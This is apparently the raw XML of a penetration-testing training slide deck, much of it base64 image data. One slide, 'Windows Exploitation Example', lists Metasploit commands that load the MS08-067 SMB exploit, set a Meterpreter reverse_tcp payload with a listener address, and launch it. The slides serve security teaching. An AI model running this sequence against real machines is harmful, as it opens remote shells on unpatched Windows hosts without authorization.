53NNGSoSUW3Y22ts6cIIVPSo/VzOt2Q8eswFrcbG1xaqmmeGS4ujqbd4PMEcxWs9HUHvBu9FIC5OSQ2UNrZm4KpHfoKIz8Zk+P1FH2ttJsRlLKoZbi631BtoQSeBv51FPFT9kpJ46usHO8kZJFThtsvcX0HVzEDUlWBzW7coy99dyR01ljpibtaJXG4xJIWdC3VIvYlWXXuvyPeNKW3R3qMUoie4jY2Qtybja40sbg9motxsEd30jZJI8tnIOY+0p007LX+NRSbANns1nSWynW1lsb294PupaWh05Jpo2bZ+LsQP1W1XuPNfqKY7VEGBll2g7SKGjSKVEXMsjBgI3KgeuL5Qbga68ahN39pl0yMesLa/tDgRVshm6WPiVJBBItdW7RfS4Oo91czVM7YytFA2/vzjZOjCo2Bw8pIDlOlxhQKzGRYQcyrYcQP3qlfRiJR9oOXEfZXaN4XxVulkkKkSvb2TZTz5anWpHd7cmHCv0zM8+KPrYiYlnuRY5Bfq8SOZ76seehtaRqT2ztnIIYcVN6scUgZQRwIBqslql9hzXQr7J+B/vepsoiSooopBiG29Lqq9gv56D5GonNTrbMt5G8beQqPz1RaJvYtmozUjnr3PWmHGJa7KvL1m8F4Dzt5VmPpS2z0k6QA9WMZ2/G408l/nNaKZheRjwHVv2BRc/EnyrDtoYwzzSSnjI7N7idB7hYe6rcUcnNzyqNHEKVIwR1L7t7i4jFDMq5U9pquuE9ERtrOAfCrS5Ir05uPhm80VfdTZwlnGbVUGcjtsQAPM391aLFHUI26z7NdSZI26ZlgjzA+ubvYgfso3vtU5Ng8TEpd+hKKC7ZQ+bKou1teNga55y7PB28ceqpjmOOl1So/EY89AskQBLmMJmvY52HG2vAk0v0eKUZmEGUC5sHvYam3W42qZWxvtXplZDHIBdwFToixbQk5mvwsO7xp5s/aCzBsoYZTY5ltrcjQ6g6g8DSGIxIkjhniAZmKiLNfL97YEkDj1b0htKB8JH02KMTRB0FghJDSSKo6NRpcsRqbnjWmekriIwVOY2W3WN8un4uQql7Tj6CUSrIhsc0MdmvY8CRxAtqCT2W41MYiKTaReOHKscbA5mzXZteXC3jUdtDcOeKN5C6MERnIAOYhVJsNeNhTRpbYkrekQG1NoGdgzKqtaxKgi/ZcefnUey0sr5lDLqCLj3jSrFBuHMygmRBcA8CePvq1qJGnLRUJEptKlXqT0dS20lQn8JH1qtba2DLhmAkWwOisNVPv7a1ST0LKDWyvlihzKSCOBHGrDsxLwK3NsxY9rXIJPebCpaP0YyOobpV1APA86fYHcCeJColQi99QdL8bWNY5x+wjxST0VrDzGOQHlwNXbZOM63cwv+8ND8LVGz+j+Y6mSPt4H86jN2driSJHHAEHXs4H4GkdSWCkbi8l+zUZqQR9K9z1E6BbNUhsWW0lvaBH1HyNROenOAls4PYQfjrWM1FsoooqZQp+0pLue8sfM00zUptFuv7vqaa5qsiLFs1Gekc9cyPofA/KtMIfeHGdHgJm5lH83JA/mFUz0b7sfa8Tdh92mp/KrBvvLbZ5HaIh/GpqY9DGGAwrvzZyPKq31g2Qce3Ikyy7z7zwbKwokkBtfJFEls0jW9VewW1JPDxsDnqemTHu2ZMHh1TkHeQtbvYED+GufTE5k2lh4z6keHMgHLM8rgnyjTypxujuYMZEz9Jls1rWvSRjFR7SKTnLt1iJbQ3yn2nicCj4YxdFJI75ZM6MxjyxspIBFrubHt41sMMYmgU8nQA/vCxrNNubl/YsNLielLdCvSZbWvZhpflV83N2oJsKhHC7W7he4HupZ1XxHg5X8iqbBJfC4FDxDAN/yUZT8bVcVPLlwNVndeC+Llj5QzYy3cHnuv8NL7u7U6bEY9L6RYp0HgqRL/ADBqyRsNDPdw/cYOM8UlkQ/8jOnztSXpa2jZMFDa/SYnOV5FYUJ17szofdTbdeNhtTGISckc0zKCTYdNkk0HL1qivSBiTLtaJBwgw1/35nP9Kx0yXyQl/B/wXz0f4cR4MudMzMxP7I/sKk92ttLjsHFOBpJGrMvIEqMy+dxUHvLi/sexJyDYrhii/jkAjX+JxTf0RSZMJ0PsZSPAj871Nq05FU6qJQEwnQtJAeMMskX7qMQh965T761iVymGLjisTML8LqhIv5VRd+sF0W1JOyeOOYfiX7p/5EP71aLNg8+HKDTNEVv2ZkIv8apN2kyfGqbRmG6XpExkkkf2pIWhlt1o1ZHQn1SQWIYXsDz1v3Vcd9sOHwE7EXMcZmXxiGfj3hSPeaquxPR7PGY0kyhI8oLA+tl7ByvU36Tdrrh9mTC/XmX7PGOZaTRreCZj7u+h1a6hG2n2KvgfS3PeNTgV6O6qX6ck5bgFrZOzW1af090zDhlzDyvWEwJZUHYF+lbhD/w4/wBv+mt5IpaF4puWzN4/Szi3jDLs5MrC4P2k8D+5UFumrRx9G2hy8PP8q72MP/Bw/gFJ4OYDEi3Z9SKqopXRGU22rNJwM+ZFPaAfhS+aorYst4k8Kf5qg0dCeBbNS2Fbre40zz0vg2649/yNYMWz7fRUTnNFTopZE7V0cfhHzNM81Pt4VtIP3h5N/eorNVVok9i+auZD1T4H5UlmozVphWN9jfAn/lH+Jam/QrjQcNLH+sr3t3MND538qht4482CkHMKf4Df+mqruTvScBiRJYtGerKo4le0ftDiPeOdV69oNHO59eRNmh+lnd9maHFoLhFaKWw1CFsyP4BiwP4h31Xd095cTh5oo4yn2dnHSKUBY306rcuVa5s3akOLhzwussbDWxvb9lhxU9xsajDuPhekEgTKQc1gbC/hUlNdesi8uN9u0WcekU//AMnGf7J/mWo70YYq8DJ7JUjwIFPvSVKF2Ti8xC5oiq3IGY5lsBfie4VW/RpicsxX2ox5j/vWRXwY0nU0XvYuzuixWJkPCVw4/wDjjB+KtVF9EuIMkuIlYG2IkmmBINjmkJ07dCKu29GO6DA4qXmkEzD8QjbL8bVU/RzthRDgoWFnQZeGjKUOvcdBpWLKbNdJpFow+xOjxWIl/wDVKN5RRJ/QazzZ9sTtXFvmN2xaxZctwY8OuXMGvp1kGn7Va/tOdYopJW9WNHkPgilj8BWSeiLAlx0retlZ2P7crXNbB4bMmspGnT4ZZUKOoZCLFSAR3aGvNkbDiwxJiTLm0Op+tZr6WT02JweGJIXLNO4BINuqifKSme5GCTB4xHjZxn+7cFyQVYg8D3gUKDcbsHNKVUXD0qYTTCTj9WVoW/DMtx/FGo/eq5NN0eGz2vkiL2va+VL2v7qYbwbN+1YZo+eaN1/FHIjj+W3vp1tAWwco7IJB5Rmpt4SKJVJsyub00YiRAYNm2LC4aTEZl1/ZVASPeKqWMbE4ycT42QMy/o41Fo4x2KvLlrqTbUmltjH/AMNF+BflS0hrrjBLRxy5JPA3biPEfOtsh/4cf7f9NYix1HiPnW3Q/wDDj/b/AKaTl8H4PTEdl7WRcChuCyoAVvrfgB/eo7YEt5QTxJJPneoXDH7tfAVKbAPXJ7AavVI5HK5GpbCb7pPCpLNUXskWjUdij5U9zVzPZ2rQvmpxs8/eL7/kaYZqe7IF5R3Bj8LfWsYyJ7o68qU+xUVGy1Ff3uisQf2j/EL/AEqt5qu29WFzRMR7N/epv8r1Q81VhlEp7Fs1Gakc9GenEGWMS4kU8Dr7mGv1rLWiKOynipK+RtWqYzQg8j1T79R8fnWfbz4TJPm5P8xofhaq8bObmVoa4TMrZ45Hif24naNvNSKlhtjHsLf6lirf7zX873qFgepGF6pKKZHj5JLFno2Isj55pJJn9qR2Y+ZJNTNmy2SR4zwDRuUYeDA3pnE9Oo3pKLW2IS7OmkUpJjcU6NoyPiJGVhxsVLWIqTCELZWZCBYMjFWXvDDUGklalRe1+XC/K4tcfEedYNdnkGzWljeOfaGNAZSLtiZXjIOhR47m6kXH0qTg3QkkyxYfHPHkyBxBK8YKkaPcEdJbhw0vUeGq1bl7PfOZjomUqL/rXI1HcLUksIpH5MdbN9H8UUvSSSy4hsuW+IlaRgovYAnldibXHbTt9zICb3kGpNg9rX4WNri3jepvPXJeodmdHVGd7Z3Gxcd2h2hjXT2RiZc477A6jwqAxOysWq/eY3HhWFuvPMFIPLU2Ola+z0z2gA0bqwLAqQVHE3HLvp1P7QkofTMqghEaKg4KAB7qTkap3FbrTqCQFbuVtfiBUZithzqLmI8baWY+Skmrpo5XFrwiZnphPj8SL2xuKt2DES2t2WzcKczvUbO9UpPZBzcdDTLlAA5VLbuRXP4mA917n4CoaZvjVs3VwuoPsj4n+3zoZsVbResLoKWzU3jNhXWeuY7RbNU1uxFmkJ/Cvmf7VX81XDc7DdQN2kt7h1R9aSWEPDZaaKKKgdA2x8WZD3fLn8KzDGwdHIyH9Uke7kfK1auRVD302flZZBw9Rvmp8rj3CqcbzRLkWLK9mozUhnoz1cgdzpmUjt/wGqxvBg+liOnXHwYfn9asmeo/aEdutyOjfRvpTREkrRnUbU+glrrbeByOWHA8fHtplFJXQsnFJUyaikp3HJURDNT2OWlaKRkSSPSyvTBJaWWSkoomOw9adslrQRjMpARRdRYHTsrKRJVk3S23kfomPVc9Tufs9/zt21OcbRbjlTL50lcmSm3S1yZqhR02LtJSDy0k0tISTVtGWdSy1D7a2sIYy548FHa3IU6mnrP97to558oOiDL3ZuLfQe6qwjbI8k+qshcTPck8zrTCV67lkplPJyHE11aPPS7MUwy5nvyFaLsDCZEF+J1Piaqe7ezMzA20X4n+1XuAWFSm/Dp41bsdhq9zUjnrzPUi45jBYgDiSAPE6CtN2NhBHGAOQCj3Dj53qi7p4EyTZraJw/EdF+p9wrR40sAOyo8j8L8a9OqKKKkVCo7bezhNEyngRa/Z7Le41I14RQsA8mM4iIxuyMLMpII7xSeerhvzsI/pkGqi0nevJ/dwPd4VSc9dcXas45Lq6Fs9eObi1JZ6M9MKQ20sFplPA+qf6TVSxOHMbWPCtCnQMCDwqvbU2fybhyb6HvqkWQnH0r8ctO4p6YzwlDY0JLVDnqtExHNS6zVDpPS6YmsoZTJYTV0JqjVxFdielop2LlsDeSUypG7Z1a4u2rDQm+bnw51amxFZ9unrMW9hfi2nyvVsbFVGccnVxy+OR++IppiMYFBJIAGpJOgpjiNoqoJZgAONyBVO2/vP0oKR6R8yeLWPwFEYWZPlUUSO1t8+KwjuznT3qv5+VU+Wa9cPLTSbFchqfgKukonH8uR5Op8Rbx5Cl9l7PLt3niewUns/ZzO3aeZ7KumytmiMfPvrG/SiXiH2zMGEUADhUiGpuptXWepMusC2evVNzYak6CkM9WncnYhkfpmHVU2S/N+beC/PwrG6VjRVui27sbI6CJQfW4t+M8fIWHuqbrlEsLV1XI3Z2JUFFFFYaFFFFACWIgDCxHnw14g91ZTvVsA4WS6g9CxOU+yeaH6do8DWt0y2psxJ42R1urCxHyIPIjkaeEurEnDsjFc9Gen28OwXwkmVtUN8j20Ydh7GHMVFZ661k4njDF89JyqGFjXGejPWmEPtDZWmguOzmPA/Sq9Pgyt8vvHMe7lV4JpnisAr8Rr28D50yZOUPopYltx0pVZalsXsQ8rHx0PnURNs4ryK/L4U9kml6KCauumpkY2HAg1yWfsHxosP1rxl/wBhERwjSzN1mPM9nkPrTPaO92UkRAE+0b28tKqsm152XKTceH1pqWc8wPD+9JXpbNUmSWO2m0zZnNzawsAABTCTFgc7nsFcLg2btPyp9hdiMeVviaa2J1it5I4ln7hUns7YpblYfH+1TOC2Kq62ue01LxQAUo+XjwRwGzwgFhUkulIhq9z0rHWBfPRnpDPT3ZGy5MTKI4xrxZj6qr7TH/L1mjVkebA2M2KlCi4Qau3sr+Z4D+1a3s/BLEgVRYAAAdgFNNg7DTDRBEHeSeLNzZvy5VK1yzn2Z2ccOqCiiiplAooooAKKKKACiiigBltTZSTxskihlPEfIg8iO2sm3n3TkwbZtXhJ0e3DsVxyPfwPwrZqTnw6uCGAIIsQRcEHkQeIp4TcSc+NSPn7PRnq+7z+jU6yYTxMJP8A9bH+U+fKs+njZGKupVhoVYEEHvBrrjJS0ccouOxTPRnpvno6SmEsXJpJ4ga56SjpKAEJdnKeIHlTdtjp7Ip/0lGetsWkR3+jJ2UomylHIeVPc9HSUWFITTBgUusYFcZ6OkoNwLhq9z03z0dJWG2OM9GekFJJAAJJ0AAuSewDnV53Z9G8klnxV0TiIxpI34j+oPj4UspKOxoxctEHu/u9LjHsgsgPXkI6q937Tdw+HGtb2HsCPCxhEHeSfWY+0x+nKneCwCRIERQqqLBVFgP87ac1yzm5HZDjUQoooqZUKKKKACiiigAooooAKKKKACiiigDwiovbW7MGLW00YYjgw0dfwuNfdwqVorU6MavZk23PRXNHdsMwlX2Gskg9/qt8PCqVjMLJC2WVGRvZdSp91+NfR1N8XgI5VyyIrr7LqGHkatHma2QlwJ6PnPpKOkrZNo+i3By6qrwn/wBt9P8Ape48rVW8b6GnH6LEqe6SMr/EpPyqy5Ysg+GaM/6SjpKtOI9FWOXgsT/hlt/OFpm/o52gP/LE+EsR/rpu8fsn0n9EF0lHSVOr6OtoH/yxHjLEP66dQei3HtxSNPxTL/Rmo7x+w6S+isdJR0lX3B+huU/pcTGvciM582y1YtneifCR2MnSTH9t8q/9KW+JNK+WKHXDNmRwRs7BUVmY8FVSzHwA1q4bE9GOJmsZrQJ2HrSHwQGw95HhWrYDZMUC5YY0jXsRQt/G3H306AqMuZvReP46WyD2Dufh8ILxpd+cj9aQ+B4KO4WqcAr2iott7OhJLQUUUVhoUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQB5XtFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAf/Z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4338" name="Picture 2" descr="http://blog.securestate.com/image.axd?picture=2011%2F10%2Ffigure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76800" y="2514600"/>
            <a:ext cx="3893946" cy="372427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92984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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MEtasploit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41842" y="990600"/>
            <a:ext cx="8181974" cy="5029200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Windows Exploitation Example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search windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>info windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ms08_067_netapi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ms08_067_netapi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>show payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.20.22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (set other options as well)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQREBQUEhIVFRIWFRQUFBUUERUUFBYVFhQVGBUUFRQXHCYeFxojGhUUHy8gIycqLCwsFx4xNTAqNSYrLCoBCQoKDgwOGg8PGiwkHyQpLCksLCwsLCwsLCwpLCksLCksLCwsLCksLCwsLCksLCwsLCksLCkpLCwsLCksLCwsLP/AABEIAOEA4QMBIgACEQEDEQH/xAAcAAABBQEBAQAAAAAAAAAAAAAAAwQFBgcCAQj/xABHEAACAQIDBAYHBAkCBAcBAAABAgMAEQQSIQUGMUETIlFhcZEHMlKBobHBFCNy0TNCYoKissLh8BVzNIOS8SREU2OTs9Il/8QAGQEAAwEBAQAAAAAAAAAAAAAAAAIDAQQF/8QAJREAAgICAwACAgIDAAAAAAAAAAECESExAxJBIlEEE5GhQmFx/9oADAMBAAIRAxEAPwDcaKKKACiiigAooooAKK8LW41E4rb4vliXpG7f1R7+f+a1tWY3RLE1H4nb0SaZsx7F1+PD41GPhpJdZnNvYXQfl86XhwiJ6qgd/E+ZraMtg23JX/Rw2Ha5/wC1JMcS3rShe5R+Q+tO6pm7O/7YraE+FkhWMJ0oiYOWLmGTLIDew4ENYDkeNMl9GP8A2WQ7MLetNIfefqTXn+ipzLH3j8qpO/G3cZHjpI4MSYkTAti0URRPmeNmzKS6k2Kq3lTzereOU7AGKjcxzPFhnzRkqQzvHnynkNWHhTU8C2i1f6Ina3mPyr0bLI9WWQfvflaq1uLj5/teOw0s8kyQHDmNpbGQdLGWYFgBccOPZVwxM4jRnb1UVnPgoJPwFK7To1U1Y3VcQvqzX7mF/nelU2xOnrxBh2obH61RdzN/sTiJsNHiYorYqKWWNos6sgiZ1+8Ri